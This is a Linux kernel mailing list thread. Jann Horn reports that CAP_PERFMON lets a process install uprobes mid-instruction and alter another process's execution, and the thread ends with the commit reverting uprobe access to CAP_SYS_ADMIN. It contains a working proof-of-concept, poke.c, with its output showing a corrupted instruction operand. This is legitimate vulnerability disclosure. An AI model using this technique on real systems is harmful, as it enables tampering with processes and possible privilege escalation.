* uprobes are destructive but exposed by perf under CAP_PERFMON
From: Jann Horn @ 2025-07-01 16:14 UTC (permalink / raw)
To: Serge Hallyn, linux-security-module, Peter Zijlstra, Ingo Molnar,
Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
Liang, Kan, linux-perf-users
Cc: Kernel Hardening, linux-hardening, kernel list, Alexey Budankov,
James Morris

Since commit c9e0924e5c2b ("perf/core: open access to probes for
CAP_PERFMON privileged process"), it is possible to create uprobes
through perf_event_open() when the caller has CAP_PERFMON. uprobes can
have destructive effects, while my understanding is that CAP_PERFMON
is supposed to only let you _read_ stuff (like registers and stack
memory) from other processes, but not modify their execution.

uprobes (at least on x86) can be destructive because they have no
protection against poking in the middle of an instruction; basically
as long as the kernel manages to decode the instruction bytes at the
caller-specified offset as a relocatable instruction, a breakpoint
instruction can be installed at that offset.

This means uprobes can be used to alter what happens in another
process. It would probably be a good idea to go back to requiring
CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
where the kernel can prove that the software breakpoint poke cannot
break the target process. (Which seems harder than doing it for
kprobe, since kprobe can at least rely on symbols to figure out where
a function starts...)

As a small example, in one terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat target.c
#include <unistd.h>
#include <stdio.h>

__attribute__((noinline))
void bar(unsigned long value) {
  printf("bar(0x%lx)\n", value);
}

__attribute__((noinline))
void foo(unsigned long value) {
  value += 0x90909090;
  bar(value);
}

void (*foo_ptr)(unsigned long value) = foo;

int main(void) {
  while (1) {
    printf("byte 1 of foo(): 0x%hhx\n",
           ((volatile unsigned char *)(void*)foo)[1]);
    foo_ptr(0);
    sleep(1);
  }
}
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3
jannh@horn:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target
[...]
00000000000011b0 <foo>:
    11b0:  b8 90 90 90 90    mov    $0x90909090,%eax
    11b5:  48 01 c7          add    %rax,%rdi
    11b8:  eb d6             jmp    1190 <bar>
[...]
jannh@horn:~/test/perfmon-uprobepoke$ ./target
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
```

and in another terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat poke.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>

int main(void) {
  int uprobe_type;
  FILE *uprobe_type_file =
      fopen("/sys/bus/event_source/devices/uprobe/type", "r");
  if (uprobe_type_file == NULL)
    err(1, "fopen uprobe type");
  if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1)
    errx(1, "read uprobe type");
  fclose(uprobe_type_file);
  printf("uprobe type is %d\n", uprobe_type);

  unsigned long target_off;
  FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r");
  if (!pof)
    err(1, "popen nm");
  if (fscanf(pof, "%lx", &target_off) != 1)
    errx(1, "read target offset");
  pclose(pof);
  target_off += 1;
  printf("will poke at 0x%lx\n", target_off);

  struct perf_event_attr attr = {
    .type = uprobe_type,
    .size = sizeof(struct perf_event_attr),
    .sample_period = 100000,
    .sample_type = PERF_SAMPLE_IP,
    .uprobe_path = (unsigned long)"target",
    .probe_offset = target_off
  };
  int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
  if (perf_fd == -1)
    err(1, "perf_event_open");
  char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0);
  if (map == MAP_FAILED)
    err(1, "mmap error");
  printf("mmap success\n");
  while (1) pause();
}
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall
jannh@horn:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke
jannh@horn:~/test/perfmon-uprobepoke$ ./poke
uprobe type is 9
will poke at 0x11b1
mmap success
```

This results in the first terminal changing output as follows, showing
that 0xcc was written into the middle of the "mov" instruction,
modifying its immediate operand:
```
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0xcc
bar(0x909090cc)
byte 1 of foo(): 0xcc
bar(0x909090cc)
```

It's probably possible to turn this into a privilege escalation by
doing things like clobbering part of the distance of a jump or call
instruction.

* Re: uprobes are destructive but exposed by perf under CAP_PERFMON
From: Mark Rutland @ 2025-07-02 11:13 UTC (permalink / raw)
To: Jann Horn
Cc: Serge Hallyn, linux-security-module, Peter Zijlstra, Ingo Molnar,
Arnaldo Carvalho de Melo, Namhyung Kim, Alexander Shishkin,
Jiri Olsa, Ian Rogers, Adrian Hunter, Liang, Kan,
linux-perf-users, Kernel Hardening, linux-hardening, kernel list,
Alexey Budankov, James Morris

On Tue, Jul 01, 2025 at 06:14:51PM +0200, Jann Horn wrote:
> Since commit c9e0924e5c2b ("perf/core: open access to probes for
> CAP_PERFMON privileged process"), it is possible to create uprobes
> through perf_event_open() when the caller has CAP_PERFMON. uprobes can
> have destructive effects, while my understanding is that CAP_PERFMON
> is supposed to only let you _read_ stuff (like registers and stack
> memory) from other processes, but not modify their execution.

I'm not sure whether CAP_PERFMON is meant to ensure that, or simply
meant to provide lesser privileges than CAP_SYS_ADMIN, so I'll have to
leave that discussion to others. I agree it seems undesirable to permit
destructive effects.

> uprobes (at least on x86) can be destructive because they have no
> protection against poking in the middle of an instruction; basically
> as long as the kernel manages to decode the instruction bytes at the
> caller-specified offset as a relocatable instruction, a breakpoint
> instruction can be installed at that offset.

FWIW, similar issues would apply to other architectures (even those like
arm64 where instructions are fixed-size and naturally aligned), as a
uprobe could be placed on a literal pool in a text section, corrupting
data.

It looks like c9e0924e5c2b reverts cleanly, so that's an option.

Mark.

* Re: uprobes are destructive but exposed by perf under CAP_PERFMON
From: Peter Zijlstra @ 2025-07-02 11:58 UTC (permalink / raw)
To: Jann Horn
Cc: Serge Hallyn, linux-security-module, Ingo Molnar,
Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
Liang, Kan, linux-perf-users, Kernel Hardening, linux-hardening,
kernel list, Alexey Budankov, James Morris

On Tue, Jul 01, 2025 at 06:14:51PM +0200, Jann Horn wrote:
> Since commit c9e0924e5c2b ("perf/core: open access to probes for
> CAP_PERFMON privileged process"), it is possible to create uprobes
> through perf_event_open() when the caller has CAP_PERFMON. uprobes can
> have destructive effects, while my understanding is that CAP_PERFMON
> is supposed to only let you _read_ stuff (like registers and stack
> memory) from other processes, but not modify their execution.
>
> uprobes (at least on x86) can be destructive because they have no
> protection against poking in the middle of an instruction; basically
> as long as the kernel manages to decode the instruction bytes at the
> caller-specified offset as a relocatable instruction, a breakpoint
> instruction can be installed at that offset.
>
> This means uprobes can be used to alter what happens in another
> process. It would probably be a good idea to go back to requiring
> CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
> where the kernel can prove that the software breakpoint poke cannot
> break the target process. (Which seems harder than doing it for
> kprobe, since kprobe can at least rely on symbols to figure out where
> a function starts...)
>
> As a small example, in one terminal:

Urrggh... x86 instruction encoding wins again. Awesome find.
Yeah, I suppose I should go queue a revert of that commit.

* [tip: perf/urgent] perf: Revert to requiring CAP_SYS_ADMIN for uprobes
From: tip-bot2 for Peter Zijlstra @ 2025-07-03 8:45 UTC (permalink / raw)
To: linux-tip-commits; +Cc: Jann Horn, Peter Zijlstra (Intel), x86, linux-kernel

The following commit has been merged into the perf/urgent branch of tip:

Commit-ID:     ba677dbe77af5ffe6204e0f3f547f3ba059c6302
Gitweb:        https://git.kernel.org/tip/ba677dbe77af5ffe6204e0f3f547f3ba059c6302
Author:        Peter Zijlstra <peterz@infradead.org>
AuthorDate:    Wed, 02 Jul 2025 18:21:44 +02:00
Committer:     Peter Zijlstra <peterz@infradead.org>
CommitterDate: Thu, 03 Jul 2025 10:33:55 +02:00

perf: Revert to requiring CAP_SYS_ADMIN for uprobes

Jann reports that uprobes can be used destructively when used in the
middle of an instruction. The kernel only verifies there is a valid
instruction at the requested offset, but due to variable instruction
length cannot determine if this is an instruction as seen by the
intended execution stream.

Additionally, Mark Rutland notes that on architectures that mix data
in the text segment (like arm64), a similar thing can be done if the
data word is 'mistaken' for an instruction.

As such, require CAP_SYS_ADMIN for uprobes.

Fixes: c9e0924e5c2b ("perf/core: open access to probes for CAP_PERFMON privileged process")
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Link: https://lkml.kernel.org/r/CAG48ez1n4520sq0XrWYDHKiKxE_+WCfAK+qt9qkY4ZiBGmL-5g@mail.gmail.com
---
kernel/events/core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index bf2118c..0db36b2 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -11116,7 +11116,7 @@ static int perf_uprobe_event_init(struct perf_event *event)
 	if (event->attr.type != perf_uprobe.type)
 		return -ENOENT;
 
-	if (!perfmon_capable())
+	if (!capable(CAP_SYS_ADMIN))
 		return -EACCES;
 
 	/*